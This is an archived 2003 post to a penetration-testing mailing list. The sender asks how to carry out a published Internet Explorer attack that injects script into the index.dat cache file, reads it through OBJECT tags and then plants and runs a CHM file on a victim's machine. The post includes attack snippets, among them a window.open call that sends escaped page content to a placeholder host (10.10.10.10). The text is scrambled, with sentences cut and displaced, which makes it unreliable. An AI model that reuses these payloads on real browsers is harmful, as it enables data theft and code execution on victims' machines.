Testing Cross-Site Scripting to Inject and run malicious code
From: Indian Tiger (indiantiger@mailandnews.com)
Date: 04/12/03
- Previous message: Sebastian Jaenicke: "Re: BIND/DNS Version check"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 12 Apr 2003 11:41:45 -0400 From: Indian Tiger <indiantiger@mailandnews.com> To: Pen-Test@securityfocus.com
HI All,
I am testing Cross-Site Scripting to Inject and run malicious code. I was
following Georgi Guninski’s Advisory, which was published on Date: 23 November
2000.
Following this advisory, I am trying to inject some malicious file at victim’s
machine & then to run that injected file.
According to this advisory we have to perform following four steps to Inject
some file & Run that file.
1) inject JavaScript in “Index.dat” by
2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary
3) After the Temporary internet Files Folders are known inject for example chm
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
I am clear up to the second step he has specified, but I am not clear with the
The code for injecting Java Script into Index.dat & displaying content of the
This code should return output of file index.dat in to new blank window but
I think to run Java Script, stored into index.dat file, first there is need to
Any Help on the above topics will be highly appreciated.
Thanking You,
Indian Tiger, CISSP
--------------------------------------------------------------
window.open("http://somehost/index.html?
JavaScript is executed in index.dat and has access to its content, which allow
to find the random directory names
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>
files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
third and fourth stage. The third stage is going to inject chm1.chm file at
the victim’s machine, but it is not clear whether this file is situated at
victim’s machine or attacker’s machine? Also where this file will be stored at
victim’s machine? This step also doesn’t use the name of random directories we
have found in the 2nd step so I don’t know why the second step is required &
how we can write Java script to find random folders from the “Index.dat” file?
index.dat file is given as:
<SCRIPT>
b=window.open("http://10.10.10.10?
rHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
setTimeout("document.writeln(s)",10000);
</SCRIPT>
when I tried this I didn’t get output of index.dat file into new window,
instead I got output of index.dat in the same window in which I had written
this code.
create a object that captures all the contents of the index.dat file and then
we should create a new window & assign its “Inner HTML Code” to the contents
of the object created. I don’t know whether it make sense or not. But I am
trying to do something like that.
Sincerely,
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
